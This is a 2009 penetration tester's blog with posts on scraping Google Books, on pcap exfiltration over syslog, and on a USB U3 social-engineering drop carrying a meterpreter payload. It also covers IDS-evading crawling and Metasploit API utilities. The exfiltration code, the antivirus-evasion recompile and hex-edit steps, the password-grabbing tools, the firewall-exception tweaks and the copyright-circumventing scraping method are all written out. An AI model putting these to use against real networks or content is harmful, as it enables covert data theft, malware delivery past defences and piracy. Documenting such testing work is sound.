Monday, June 29, 2009

Translating forbidden URLs

This summary is not available. Please click here to view the post.

Tuesday, June 2, 2009

Google Books Spidering

I don't usually read books on Google Books. The scans are not of the best quality and they do not allow me to conveniently print a page or two for offline reading. This is apparently discouraged by Google. It's supposed to be a "demo" site for further buying experience and I am fine with that.
This post is not meant to discuss the merits of "crippled" demos. I actually wanted to talk a little about content protection Google chose to employ for the content.

In my mind, if you are trying to prevent content sifting or crawling ( and the obviously do since there is a copyright notice on every page), you should evaluate more methods of protection than obfuscating Javascript code fetching images of scanned pages into the browser. You should not rely on AJAX calls to eliminate first generation spidering (href). You should not allow incomplete URL parameter randomization, and you SHOULD tie requests to an existing session.

So, on to the example.
Suppose I like Ruby by Example Book, and I do not agree with Google's TOS, and I want to use the book's content for my own purposes.
Every page of the book scan I am interested in gets fetched with XHR from google and rendered in the browser. Breaking on the request and following it around lands me into the following format JSON response.


Content-Type: application/javascript; charset=UTF-8
Server: OFE/0.1
Content-Length: 2496

{"page":[{"pid":"PR21","src":"http://books.google.com/books?id=kq2dBNdAl3IC\x26pg=PR21\x26img=1\x26zoom=3\x26hl=en\x26sig=ACfU3U2ydqAZXhIBKIH1XKTJhS4Ay2IXkg","highlights":[{"X":370,"Y":51,"W":26,"H":11},{"X":139,"Y":93,"W":19,"H":10},{"X":218,"Y":119,"W":19,"H":10},{"X":352,"Y":186,"W":26,"H":11},{"X":230,"Y":214,"W":25,"H":11},{"X":417,"Y":255,"W":26,"H":11},{"X":493,"Y":269,"W":23,"H":11},{"X":370,"Y":449,"W":25,"H":11},{"X":402,"Y":490,"W":26,"H":11},{"X":139,"Y":585,"W":22,"H":11},{"X":320,"Y":614,"W":23,"H":11},{"X":146,"Y":681,"W":21,"H":9},{"X":158,"Y":690,"W":20,"H":9},{"X":139,"Y":699,"W":20,"H":9}],"flags":0,"order":22,"uf":"http://books.google.com/books_feedback?id=kq2dBNdAl3IC\x26spid=ygOBAha9Lj5wEmJbb7L0E4AMedYBAAAAEwAAAAvsLgsil0rRCj9QbBB0CmBqRC_Lik05VtZnyTK-XBfQ\x26ftype=0","vq":"ruby by


..... Many more goes here.

This blob is processed by and obfuscated long-name JS file which puts into the DOM and renders in the browser. Let's say it's irrelevant at the moment.

Look at the following snippet from JSON response:


"src":"http://books.google.com/books?id=kq2dBNdAl3IC\x26pg=PR21\x26img=1\x26zoom=3\x26hl=en\x26sig=ACfU3U2ydqAZXhIBKIH1XKTJhS4Ay2IXkg


OK, \x26 is really &. Otherwise, it's a valid url 3-time zoomed image of page 21 of the book id=kq2dBNdAl3IC .

Also there is a dynamic signature of the page at the end: sig=ACfU3U2ydqAZXhIBKIH1XKTJhS4Ay2IXkg

Every page of this book has different signature. However, look at the following 2 requests:


http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA102&img=1&zoom=3&hl=en&sig=ACfU3U0j7KKM_nSZ5HTwPQxpka2gDwJFsQ
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA103&img=1&zoom=3&hl=en&sig=ACfU3U2itwtHSRsi3gGA_1uqDFYlX76BqA


There is a non-random element at the beginning of the payload. I am not going to go into how we can try and brute force or fuzz the signature here, or how to read client-side JS file to figure out what that signature consists of. The point is that the content navigation is not tied to session cookies or any other UI navigation data. Simple GET on the URL fetches the image of a page.

All you have to do now it to set your favorite web proxy to log URLs for JPEGs conforming to ".*sig=ACfU3U.*" and iterate the pages. You don't even need to capture the content yet.

Google does the job of fetching all the pages once you start mouse-scrolling in the book DIV. So you scroll through the whole book, then you go to you proxy log and pick up the following records (substituting the \x26 -> & ).


http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA102&img=1&zoom=3&hl=en&sig=ACfU3U0j7KKM_nSZ5HTwPQxpka2gDwJFsQ
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA103&img=1&zoom=3&hl=en&sig=ACfU3U2itwtHSRsi3gGA_1uqDFYlX76BqA
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA105&img=1&zoom=3&hl=en&sig=ACfU3U0SJesKmEQ2HUl2ntgNVBIrLK7UHQ
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA106&img=1&zoom=3&hl=en&sig=ACfU3U3i-gOkxdtYfeGLd7CFsRGZiPnT_Q
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA107&img=1&zoom=3&hl=en&sig=ACfU3U0FbGnYvyAY2T6uGV9rA-bY0J4cvw
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA10&img=1&zoom=3&hl=en&sig=ACfU3U3B0rfiUmevGsmVHgLEDN3sxANqkg
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA11&img=1&zoom=3&hl=en&sig=ACfU3U3uXbNxXALDKMG-OZ2bEGVlzN3JaA
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA13&img=1&zoom=3&hl=en&sig=ACfU3U0Bb32Lu4L9KzlCRS1gbURVfNcklA
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA14&img=1&zoom=3&hl=en&sig=ACfU3U1HVLZyKZBfm9y01Ly-Lp6AEo7B8Q
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA15&img=1&zoom=3&hl=en&sig=ACfU3U3aVGlHL9Sph_ttbm7tfSWVNyyFMQ
http://books.google.com/books?id=kq2dBNdAl3IC&pg=PA16&img=1&zoom=3&hl=en&sig=ACfU3U1CFrpu9LiQwuS1HIcsYu6qBrNppg


You now plug it into the script (curl will do, so will wget) to fetch the book's content.

Now, I have not researched it enough, but I wonder if Watir or Selenium, or other browser automation frameworks can scroll the content for you and automate the process altogether.

I don't encourage anyone to actually copy Google's content - go buy the book if you like it, because the people who suffer most from copying are the authors.
However, the idea here is - how does Google plan to protect my data tomorrow if it cannot protect something it makes money on today.

Monday, June 1, 2009

Pcap2Syslog for .NET or Stuck transferring PCAP over UDP

I was recently in a situation where I wanted to transfer some fairly large .pcap file (1GB) from the internal network as part of the engagement. I did have direct HTTP connectivity to the outside (proxied and monitored for illegal sites) so I tried HTTP uploads but for some reason my transfers were getting dropped after about 5 megs into the transfer. I had no control over the issue and frankly I did not want to go even deeper than I already was. I think I was in the "3rd" tier with all nice policies applied to users like me so we are not able to waste company's time surfing the internet :) Anyway, all I had was DNS outbound for resolution, crippled HTTP and a Syslog. Don;t ask me why Syslog was enabled to the internet. Probably for monitoring or data collection purposes for manged service provider or something like that.

I started thinking of chopping my pcap into smaller chunks and doing the upload. I knew exactly what I would do on *nix and had scripts made for similar purpose but I happened to be on Windows and did not readily know what tools I would use.

So DNS or Syslog?

I did not yet research tools to allow me to chop up some binary data (such as PCAP), package them in smaller chunks ( Base 64 or not ) and shove them over DNS tunnel. I am sure they do exist and most likely many smart folks out there can point me to the ones they prefer. To date, I was ok bypassing content filtering with XML/RPC streams over HTTP(S). Not this time though.

Syslog? Well, it is foreign to Windows to begin with... What are the chances of getting the right tools fast enough to parse PCAP and transform them into syslog messages. I gather there would be enough dependencies to deter me ( or detect my activities) from doing so. Yeah, Cygwin comes to mind..

OK, start thinking outside the box. I have VS2008 so I have access to .Net libraries. But what can parse PCAP and which library can generate syslog messages? Well Syslog is a simple protocol and message generation can be accomplished with plain Sockets, something like this.
Indeed, all you need is


using System.Net;
using System.Net.Sockets;

and in a nutshell:

1. Instantiate UDP transport

udp = new UdpClient(ipAddress, 514);

2. Build Syslog String according to the RFC:

string[] strParams = { priority.ToString()+": ", time.ToString("MMM dd HH:mm:ss "),
machine,
body };

3. Send the chunk out.

rawMsg = ascii.GetBytes(string.Concat(strParams));
udp.Send(rawMsg, rawMsg.Length);
udp.Close();


Answer to the first question came in the form of Sharppcap . It;s a standalone assembly which lives in

Tamir.IPLib.SharpPcap.dll.



using System;
using System.Text;
using System.IO;
using Tamir.IPLib;
using Tamir.IPLib.Packets;


Since It can read pcaps offline I can do the following:


//Get an offline file pcap device
device = SharpPcap.GetPcapOfflineDevice(capFile);
//Open the device for capturing
device.PcapOpen();


Then, of course, you can iterate through packets like so:


while ((packet = device.PcapGetNextPacket()) != null)
{

DateTime ptime = packet.PcapHeader.Date;
int plen = packet.PcapHeader.PacketLength;

// Prints the time and length of each received packet to debug
Console.Write("{0}/{1}/{2} - {3}:{4}:{5}",
ptime.Day, ptime.Month, ptime.Year, ptime.Hour, ptime.Minute, ptime.Second);
StringBuilder sbuilder = new StringBuilder();

// Append to Message builder
sbuilder.Append()

// Either Call Syslog routines from above here,
// or call Syslog classes from here.
}




If you want to send based on filters, only what you want out of the PCAP (say, communication map to and from the host over UDP), then in a while loop you can introduce more laborate processing.


if (packet is UDPPacket) {
DateTime time = packet.Timeval.Date;
int ulen = packet.PcapHeader.PacketLength;
UDPPacket udp = (UDPPacket)packet;
string srcIp = udp.SourceAddress;
string dstIp = udp.DestinationAddress;
int srcPort = udp.SourcePort;
int dstPort = udp.DestinationPort;
Console.WriteLine(" UDP {0}:{1} -> {2}:{3}", srcIp, srcPort, dstIp, dstPort);
sbuilder.Append(String.Format(" UDP {0}:{1} -> {2}:{3}",
srcIp, srcPort, dstIp, dstPort));


// Append to Message builder here if you want
sbuilder.Append()

// Either Call Syslog routines from above here,
// or call Syslog classes from here.

} }

I turned out better than I expected. I filtered what I needed for further analysis, and my partially "interesting" data was sent in short messages over Syslog outbound.

Next, I should really look at DNS covert channels. If anyone has suggestions on tools, please let me know.



Thursday, May 28, 2009

Automating AMI builds for Amazon EC2

I started to use Amazon EC2 cloud for penetration tests. Besides having short-term (costs money) scalable processing power for various tasks it also enables me to care less if automated IPS response blocks my IP. I can always bring up another instance...

Provisioning new instances is not hard. There's now AWS console to take advantage of. Useful and pretty. What's been bugging me is that the EC2 images are snapshots of system configuration that revert back to known configuration. So if I apt-get my system and/or download some software I have to rebuild the image so I don;t loose the work. Yes I can mount S3 persistent storage drive and "try" to install all my software there; and then just move it between instances as I bring them up. However it may not work for me all the time. I want to have an (semi)-automated way of "fixating" changes I make to core system and staring new instances with updated image.





So here is somewhat automated way of building Amazon EC2 AMIs.


#!/bin/bash


usage(){
echo "ERROR: arguments "
}

EC2_HOST="$1"
EC2_SNAPSHOT="$2"

# Environment
EC2_HOME=/usr/local/ec2
EC2_PRIVATE_KEYF=pk-RKxxxxxxxxxxxxxxxxxxxxxx.pem
EC2_PRIVATE_KEY=$EC2_HOME/pk-RKxxxxxxxxxxxxxxxxxxxxxxx.pem
EC2_CERTF=cert-RKxxxxxxxxxxxxxxxxxxxxxxxxx.pem
EC2_CERT=$EC2_HOME/cert-RKxxxxxxxxxxxxxxxxxxxxxxxxxx.pem
EC2_HOST_DIR="/mnt"
EC2_RSA="$EC2_HOME/id_rsa-dxs-keypair"
EC2_ACCT=2245946456456456
EC2_DEFAULT_ARCH=i386

S3_BUCKET="dxs-yZksjhflsaudhflkajsdf"
EC2_ACCESSKEY="05HAPBln3245jk32j45"
EC2_SECKEY="pdyyyyyyyyyyyyyyyyyyyyyyyyyyy"

if [[ $# -ne 2 ]]
then
usage && exit 1
fi


echo "[*] Going to $EC2_HOME"
cd $EC2_HOME

echo "[*] Copying [PRIV] and [CERT] from $EC2_HOME to $EC2_HOST"
scp -i $EC2_RSA $EC2_CERT $EC2_PRIVATE_KEY root@$EC2_HOST:$EC2_HOST_DIR



echo "[*] Building AMI $EC2_SNAPSHOT to $EC2_HOST_DIR"
ssh -i $EC2_RSA root@$EC2_HOST \
"EC2_HOME=$EC2_HOME $EC2_HOME/bin/ec2-bundle-vol -d $EC2_HOST_DIR -k \
$EC2_HOST_DIR/$EC2_PRIVATE_KEYF \
-c $EC2_HOST_DIR/$EC2_CERTF -u $EC2_ACCT -r $EC2_DEFAULT_ARCH -p $EC2_SNAPSHOT"

echo "[*] Uploading AMI $EC2_SNAPSHOT to S3"
ssh -i $EC2_RSA root@$EC2_HOST "EC2_HOME=$EC2_HOME $EC2_HOME/bin/ec2-upload-bundle \
-b $S3_BUCKET -m $EC2_HOST_DIR/${EC2_SNAPSHOT}.manifest.xml -a $EC2_ACCESSKEY -s \
$EC2_SECKEY"

echo "[*] Checking S3 bucket"
/usr/bin/s3cmd ls s3://$S3_BUCKET

echo "[*] Currently Registered Instances"
$EC2_HOME/bin/ec2-describe-images

echo "[*] Registering Instance ${EC2_SNAPSHOT} "
$EC2_HOME/bin/ec2-register $S3_BUCKET/${EC2_SNAPSHOT}.manifest.xml

echo "[*] Newly Registered Instances"
$EC2_HOME/bin/ec2-describe-images If

You may need to fetch Amazon AMI Tools and creating AMI build environment
on EC2 instance if you don;t have it yet.

#echo "[*] Getting ec2-ami-tools from AMAZON"
wget http://s3.amazonaws.com/ec2-downloads/ec2-ami-tools.zip -o /tmp/ec2-ami-tools.zip

#echo "[*] Getting ec2-ami-tools to $EC2_HOST"
scp -i $EC2_RSA /tmp/ec2-ami-tools.zip root@$EC2_HOST:$EC2_HOST_DIR

#echo "[*] Making $EC2_HOME on $EC2_HOST"
ssh -i $EC2_RSA root@$EC2_HOST "mkdir -p /usr/local/ec2"


Of course, there's no limit to how automated you can make it.

Wednesday, May 27, 2009

Querying WHOIS Webservice with Powershell

There's an interesting WHOIS Web service at TryNT. If you are scanning a range of addresses trying to determine the owner it's useful to automate.

Apparently TryNT gets banned from certain IP ranges, or simply going too hard at Whois servers, so sometimes the query returns error. But for the most part it works.

Here's how one can query Whois via TryNT webService:



PS C:\Users\dxs\Code\powershell> gc .\Whois-Webservice.ps1
function IpOwner(

[string]$ip="4.2.2.2"
){

BEGIN{
$whois=@{"query"=$ip};
$ErrorActionPreference="SilentlyContinue"
}

PROCESS {

#$uri="http://75.101.151.29/whois-api/v1/?h="+$ip+"&f=0"
$uri="http://www.trynt.com/whois-api/v1/?h="+$ip+"&f=0"
$resp=[xml](New-Object -TypeName System.Net.WebClient).Downloadstring($uri)
$whois.Add("organization",
$($resp.SelectNodes(
"descendant::Trynt/Whois/regrinfo/owner/organization") |
% { $_.InnerXml}) )
$whois.Add("TechEmail",
$($resp.SelectNodes(
"descendant::Trynt/Whois/regrinfo/tech/email") |
% { $_.InnerXml}) )
}

END{
Write-Host $whois.Values
}
}


1..254 | % { sleep(2); IpOwner("124.$_.165.1") }

The run:


PS C:\Users\dxs\Code\powershell> .\Whois-Webservice.ps1
SK Networks co., Ltd 124.1.165.1
WADONG ELEMENTARY SCHOOL 5ypascal@lycos.co.kr 124.2.165.1
Jeonrabukdo Wanju Education Office i3cc11@hanmail.net 124.3.165.1
GE Capital International Services munish.dargan@ge.com 124.4.165.1
KuRO TV noc@cnm.co.kr 124.5.165.1
NETWORK_VISMIN_DSL_IP_POOL aaa81020@globenet.com.ph 124.6.165.1
SIFY INFRASTRUCTURE ipadmin@sifycorp.com 124.7.165.1
Taiwan Fixed Network CO.,LTD. steve_huang@howin.com.tw 124.8.165.1
Taiwan Fixed Network CO.,LTD. steve_huang@howin.com.tw 124.9.165.1
Taiwan Fixed Network CO.,LTD. steve_huang@howin.com.tw 124.10.165.1
Taiwan Fixed Network CO.,LTD. steve_huang@howin.com.tw 124.11.165.1
Taiwan Fixed Network CO.,LTD. steve_huang@howin.com.tw 124.12.165.1
TELEKOM MALAYSIA BERHAD ssc@tmnet.com.my 124.13.165.1
6F Greatwall Bldg., A38 Xueyuan Road Haidian District,Beijing speed0822@sina.com 124.14.165.1
6F Greatwall Bldg., A38 Xueyuan Road Haidian District,Beijing speed0822@sina.com 124.15.165.1
China Science & Technology Network lihong@cstnet.net.cn 124.16.165.1



Syncing NirSoft Repository

Nirsoft has a great collection of tools streamlining some aspects of offensive penetration and system management. If you are stuck without your toolkit, it's possible to automaticaly sync Nirsoft repository to your local cache and go from there. The site posts directory of utils here
Each XML file describes individual utility including direct download link which we can use to cync the depots.

Here's my Powershell script.



PS C:\Users\dxs\Code\powershell> gc .\SyncNirsoft.ps1


function GetNirSoftUtils(
$padLink=[string]"http://www.nirsoft.net/pad/pad-links.txt"

){

BEGIN{
Write-host "Getting PAD link"
$webclient=(New-Object -Type System.Net.WebClient)
$webclient.DownloadFile($padlink,"$(pwd)\pad-links.txt")
$padidx=$( Get-ChildItem $(pwd) "*.txt" | %{ $_.Name } )
write-host "Gotten: $padidx"

}
PROCESS{
Write-host "Getting PAD XML Links"
foreach ( $padxmllnk in $(Get-Content $padidx )){

# strip http:// for filesystem operation
$padxmllnkfs=$padxmllnk -replace "http://", ""

# basename the file (i.e /path/to/file -> file )
$padxmlfs=(split-path $padxmllnkfs -leaf).split("/")[-1]

# Conform to full path
$padxmlfs="$(pwd)\$padxmlfs"

# Download XML index files
Write-Host "Getting Index $padxmllnk --> $padxmlfs "
#$webclient.DownloadFile($padxmllnk,"$padxmlfs")

# Parsing Index and Getting Depot Download links
$depotids=[XML](Get-Content $padxmlfs )
$depotURL=$($depotids.SelectNodes(
"descendant::Web_Info/Download_URLs/Primary_Download_URL") |
% { $_.Inner

Xml})


# strip http:// for filesystem operation
$depotfs=$depotURL -replace "http://", ""

# basename the file (i.e /path/to/file -> file )
$depotfs=(split-path $depotfs -leaf).split("/")[-1]

# Conform to full path
$depotfs="$(pwd)\$depotfs"
Write-Host "Getting Depot $depotURL --> $depotfs "

$webclient.DownloadFile($depotURL,"$depotfs")

}
}
END{
Write-host "end"
}

}








Runtime example:


PS C:\Users\dxs\Code\powershell> .\SyncNirsoft.ps1
Getting PAD link
Gotten: pad-links.txt
Getting PAD XML Links
Getting Index http://www.nirsoft.net/pad/acm.xml --> C:\Users\dxs\Downloads\Nirsoft-PAD\acm.xml
Getting Depot http://www.nirsoft.net/utils/acm.zip --> C:\Users\dxs\Downloads\Nirsoft-PAD\acm.zip

Tuesday, May 26, 2009

Dynamic Link Crawler

So in a typical Web assessment one of the things one normally does is crawl all or some portion of a target website. It just makes the "big" picture a bit clearer when looking at how the web app is structured. Conventional crawlers work on href: references, recursively. Recently I looked at the site which I could not crawl. To be more specific, the site allowed me to either crawl a few links and then it would stall me. Other times, it would send my crawler into infinite loop. Either way, I could not accomplish what I came there to do.

It appeared that Web IDS module was timing the link references and If I went too fast it would shut me down for 10 minutes. Additionally, my crawler's User-Agent near useless navigating dynamically generated buttons/links in AJAX pages. I was a bit stuck. I don't mind manually testing the site, and in fact, I prefer going near-manual once I get through the initial crawl. But I really did not want to spend the whole day manually punching in ( let's call them item number, like in shopping cart scenario ) items to get through all the listings.

Well, we are in Web 2.0. As much as I wanted to stick with good-ol' techniques or fall back to lazy manual crawling I wanted to try and automate form submissions and searches. I needed a browser automation, really.

First I wanted to drive the IE via Powershell COM bridge.
It's a nice solution and I will be looking at it in depth some time later. However, I went with Watir framework to test my crawls and move on to more interesting stuff.

In IE (don;t you love when the site is only interested in MS-made browsers... ) the following was accomplished. Suppose there's a search field and a type of search to perform. I was interested in crawling through the people in the catalog.

I also had a driver script, but manually the following can be invoked as:

C:\Users\dxs\Tools\Ruby\bin\ruby.exe .\wsearch.rb LN "Blakkenship"
LN- for LastName field of search.


Code:

require 'watir'
require 'watir/close_all'


browser = Watir::IE.new
form=nil;
criteria=nil;

if ( ARGV.length == 2 )
criteria = ARGV[1]
format = case ARGV[0]
when "KW" then
form="formKeyword"

when "LN" then
form="formLastname"

when "FN" then
form="formFirstname"

else
raise "Invalid Format Arguments: Need KW,LN,FN etc."
end



else
puts "Error in arguments: specify Format (KW,LN,FN,etc.) and Search Criteria"
exit(1)
end

site = "http://site.com/index.cfm?contentID=21&type=1"

browser.goto site
puts "Searching through for: #{form} , criteria: #{criteria}"
browser.text_field(:name, form).set criteria

browser.button(:name, "Search").click
puts "\n\n"
browser.links.each { |l| puts l.href + "--->" + l.text if l.text =~ /#{criteria}/io }

Watir::IE.close_all



Output:

http://url.reference.to.entities?here&it=comes -> Mnemonic Name

I have to admit, instrumenting browsers is slow, and I was not nearly as fast as with the conventional crawler. Then again, the code is crude, no threading, no optimization, just plain "hacked-up" in a hurry. 7 hours later, and 100% under IDS radar, I emulated a human browsing the site. I had a nice database of stuff to work with come morning...


There is also FireWatir for driving Firefox in case it;s needed.

Saturday, May 23, 2009

Social Engineering meets Offensive technologies: using USB U3 flash drive with meterpreter payload

I was recently involved in a Social Engineering experiment the goal of which was to obtain access to a PC inside the organization. I am not going to cover the social engineering aspect of the job in this post. I want to concentrate on another, technical, aspect of how close proximity to physical hardware has gotten the data I needed.

I have been reading elsewhere on how Social Engineers leverage client side exploitation which involves either a browser exploitation or email attachments, or
USB devices left with the "secretary". During the engagement I had an opportunity to
corce the receptionist into printing out my "resume" on her machine. So I thought it may be a perfect time to try the "USB" way. To that day I never had messed around with U3 system or created my own custom payload for that specific purpose. This was a perfect opportunity to have fun.

There are several viable approaches and already pre-made USB payload distribution serving the purpose: HackSaw, SwitchBlade, others. Read more Here:
http://dotnetwizard.net/soft-apps/hack-u3-usb-smart-drive-to-become-ultimate-hack-tool/ and here: http://wiki.hak5.org/wiki/USB_Switchblade

I decided to go with customized version of Switchblade. I ripped out what I did not need for the compromise of the targeted computer, created U3CUSTOM image and overlayed the contents of my Walmart-bought $10 U3 SanDisk 1GB Cruzer drive.

The goal was to show up the next morning and attempt to hand the drive with my "resume" to the secretary (very nice and honest woman, btw), and have here print it out. I chose not to rely on Microsoft Word macros because I had some knowledge about the company's policy preventing such elevation. I also knew that the company ran updated Antivirus, and that the solution needed to be stealthy. I was not sure which one though, so I had to be careful to avoid detection of the payload on my USB as best I could. I also had to provision for connection back to her PC.

I needed to know the IP and all other relevant information and only had about 20-30 seconds of "hit-and-run" while she opens up the document and hands me the printed copy.

Prep Steps taken:
1. Remaster U3 image to include Alex Sotirov's http://www.phreedom.org/software/metsvc/. Modify the source and recompile it with MinGW compiler to elevate the chances of AV evasion. Something like this:

C:\metsvc-1.0\metsvc-1.0\src>c:\MinGW\bin\gcc.exe -O4 -o metsvc.exe metsvc.cpp -l ws2_32 -l advapi32


This executable has given me trouble before when I tried several packers: UPX and ASPack, and MPRESS with various degrees of passing the score on VirusTotal. I finally decided not to pack at all and go with heavy optimization at compile time and hexeditor to polish the deal.

I would have loved to use msfpayload for obfuscation but I had no linux box at my disposal, and I did not seem to find this executable in Win32 MSF Framework distribution.

2. UPX-pack other useful executables fetching the history and passwords from her PC (in case my remote session connection fails and I need to login directly to PC).

3. Once inserted into USB slot, U3 will silently run my chain of commands. I had to test for the whole operation to complete within 20 seconds. I have added several more tweaks ( like enabling firewall exceptions for the meterpreter service, via netsh commands) to make extra checks.

4. I remove the drive with information saved in the logs and go from there...

Show time

Everything went better than I expected from the AV evasion perspective. No popups or error messages. I even got Wireless Key hash via WIFIKE from NirSoft. The logs showed that the meterpreter service did start up and I did eventually find a way to verify that :)


So I was happy because I now have more or less another methodology I can use to help others realize the risks of Social Engineering meeting Exploitation technology.

Wednesday, May 13, 2009

Discovering Metasploit API: Structure of installation

I was playing with MSF user cache and overwrote it, accidentally :)

1. To avoid my inevitable sloppiness in the future I am going to try and offload scripts to a more "static" location ( like ~/Code/metasploit) and try and invoke MSF APIs from there. This will allow me to develop and debug scripts outside of ~/.msf or /modules/. I can always move the m there eventually.

For that I have to add the following at the beginning of the script:

$:.unshift("/Users/dimas/framework-3.2/lib")

This line essentially allows me to prepend MSF library path to the search order for useful MSF classes and modules.

2. To better understand how MSF is laid out I also wanted to create a little helper for myself showing what's where. MSF class Msf::Config allows to create such a reference.
I will use calls similar to the following:

Msf::Config.get_config_root


For detailed information see Metasploit API here.

I am also going to use MSF's Rex library to nicely format the table of locations. Like so:


rt=Rex::Ui::Text::Table.new({
"Header" => "Structure of the installation",
"HeaderIndent" => 3,
"Columns" => ["Setting Name", "Location"],
"Indent" => 1

})


Here's what I came up with:



#!/usr/bin/env ruby
#
$:.unshift("/Users/dimas/framework-3.2/lib")

#
require 'rex/ui'
require 'msf/base'

rt=Rex::Ui::Text::Table.new({
"Header" => "Structure of the installation",
"HeaderIndent" => 3,
"Columns" => ["Setting Name", "Location"],
"Indent" => 1

})
rt.add_hr()
copts={
"Config Root" => Msf::Config.get_config_root,
"Install Root" => Msf::Config.install_root,
"Config Directory" => Msf::Config.config_directory,
"Config File" => Msf::Config.config_file,
"Data Directory" => Msf::Config.data_directory,
"Module Directory" => Msf::Config.module_directory,
"Plugin Directory" => Msf::Config.plugin_directory,
"Script Directory" => Msf::Config.script_directory,
"Session Directory" => Msf::Config.session_log_directory,
"User Module Directory" => Msf::Config.user_module_directory,
"User Script Directory" => Msf::Config.user_script_directory,
"Log Directory" => Msf::Config.log_directory
}

copts.each { |k,v| rt.add_row([k,v]) }
rt.add_hr()
rt.print


And I now have a nice reference:

Structure of the installation
=============================

Setting Name Location
------------ --------

Plugin Directory /Users/dimas/framework-3.2/plugins
Script Directory /Users/dimas/framework-3.2/scripts
User Module Directory /Users/dimas/.msf3/modules
Config Directory /Users/dimas/.msf3
Config Root /Users/dimas/.msf3
Data Directory /Users/dimas/framework-3.2/data
Log Directory /Users/dimas/.msf3/logs
User Script Directory /Users/dimas/.msf3/scripts
Session Directory /Users/dimas/.msf3/logs/sessions
Module Directory /Users/dimas/framework-3.2/modules
Install Root /Users/dimas/framework-3.2
Config File /Users/dimas/.msf3/config

Monday, May 11, 2009

Discovering Metasploit API : Utility functions

I often write scripts and programs to help me in my automation and testing projects. Many times I find it easier to do a one- or two- liner or write a short program than to search for a command line tool or GUI interface to accomplish my tasks. There are so many great specialized tools out there but I just don't do a good job of keeping track of their releases and functionality. However, I am very much fond of the scriptable frameworks because they give you best of the both worlds: flexibility and familiarity/repeatability.

So I have started playing with Metasploit API to better understand the framework and see what else I could be doing with it. I wanted to educate myself on the "framework" part. Besides, the quality of code is amazing - I am actually referencing Metasploit Framework for Ruby programming.

I started by reading the Developer's Guide and going through Rex API first.

Here are some things I will use going forward.

- Can discover Byte-order of the Host/target:

Rex::Arch.endian("ppc") => 1
Rex::Arch.endian("x86") => 0
- Can Pack and Re-pack data based on the byte-order
>> Rex::Arch.pack_addr(ARCH_X86,0x7889)
=> "\211x\000\000"
>> Rex::Arch.pack_addr(ARCH_MIPS,0x7889)
=> "\000\000x\211"


- Can programmatically take advantage of Inline assembly:
>> Rex::Assembly::Nasm.assemble("Mov ebp, 0x1")
=> "\275\001\000\000\000"


... and disassembly
>> Rex::Assembly::Nasm.disassemble("\275\001\000\000\000")
=> "00000000 BD01000000 mov ebp,0x1\n"


- Can determine OS cross-platform:
>> Rex::Compat.is_macosx
=> true


- Can open browser on target system ( also cross-platform. This example is what Windows likes)
Rex::Compat.open_browser(url='http://metasploit.com/')


Also, conversion and transformation facilities are very handy.
- Convert To ASCII encoding
>> Rex::Encoder::NDR::byte(0x5e)
=> "^"


- XOR encode/decode
Rex::Encoder::Xor::EncoderKlass = Rex::Encoding::Xor::Dword
enc=Rex::Encoder::Xor.new
enc.encode("AAA",'')


- or -
enc.encode("AAA",'BADCHARS-GO-HERE')
=> "\340\267y"


Now, this is nice and very useful - Obfuscating Javascript:
@opts={"Strings"=>nil, "Symbols"=>{"Namespaces"=>[], "Variables"=>['a'], "Classes"=>[], "Methods"=>['fun1']}}

js="var a=5; function fun1{ return false; }; //Comment"

Rex::Exploitation::ObfuscateJS.new(js, @opts).obfuscate
=> "vgMzBoAwuwunIaYjqXMaeHaGBWr gMzBoAwuwunIaYjqXMaeHaGBW=5;
function jibbyKShzFDQ{ return fgMzBoAwuwunIaYjqXMaeHaGBWlse; }; "


- Epoch to Human Time Conversion and back
>> Rex::ExtTime.sec_to_s(6444444)
=> "74 days 14 hours 7 mins 24 secs "


>> Rex::ExtTime.str_to_sec("5 days 4 hours 3 minutes")
=> 446580


- Equivalent of "which" on *nix platforms
>> Rex::FileUtils.find_full_path("apropos")
=> "/usr/bin/apropos"


- MIME encodings and attachments. I always miss this one - cannot seem to remember the format and have to go back to my old scripts to reference.

msg=Rex::MIME::Message.new
msg.add_part("hello",'text/plain',"8bit",nil)
msg.add_part_inline_attachment("this is inline", "inline_name")
msg.to_s
=> "\r\n\r\n--_Part_525_148040077_1316503564\r\nContent-Type: text/plain\r\nContent-Transfer-Encoding: 8bit\r\n\r\nhello\r\n--_Part_525_148040077_1316503564\r\nContent-Type: application/octet-stream; name=\"inline_name\"\r\nContent-Transfer-Encoding: base64\r\nContent-Disposition: inline; filename=\"inline_name\"\r\n\r\ndGhpcyBpcyBpbmxpbmU=\r\n\r\n--_Part_525_148040077_1316503564--\r\n"


- Ad-hoc Ruby block execution
Rex::Script.execute("puts 'hello'")


- Abundant Networking functionality
Rex::Socket.addr_atoi("1.2.3.4")
=> 16909060


Rex::Socket.addr_ntoa("\001\002\003\004")
=> "1.2.3.4"

>> Rex::Socket.bit2netmask(18)
=> "255.255.192.0"


...Invaluable:
>> Rex::Socket.cidr_crack("192.168.3.0/25")
=> ["192.168.3.0", "192.168.3.127"]


IP validation
>> Rex::Socket.dotted_ip?("1.2.3.4")
=> true
>> Rex::Socket.dotted_ip?("1.2.3.4.")
=> false


DNS Resolution
>> Rex::Socket.resolv_to_dotted("www.google.com")
=> "208.67.216.231"


sockaddr Structs
>> Rex::Socket.to_sockaddr("208.67.216.231","80")
=> "\020\002\000P\320C\330\347\000\000\000\000\000\000\000\000"

Again, Invaluable - Walking IP ranges
> rw=Rex::Socket::RangeWalker.new("192.168.1.1-192.168.2.2")
=> #
>> rw.next_ip
=> "192.168.1.1"
>> rw.next_ip
=> "192.168.1.2"
>> rw.next_ip
=> "192.168.1.3"

Subnet Walking
sw=Rex::Socket::SubnetWalker.new("192.168.1.0","20")
=> #
>> sw.netmask
=> "208.69.36.132"
>> sw.next_ip
=> "192.168.1.0"


Back to Text Conversion:
>> Rex::Text::compress("dfgdf dfgdfg ddddd")
=> "dfgdf dfgdfg ddddd"


Base-64 in/out:
>> Rex::Text::encode_base64("hello world",":::")
=> "aGVsbG8gd29ybGQ=:::"
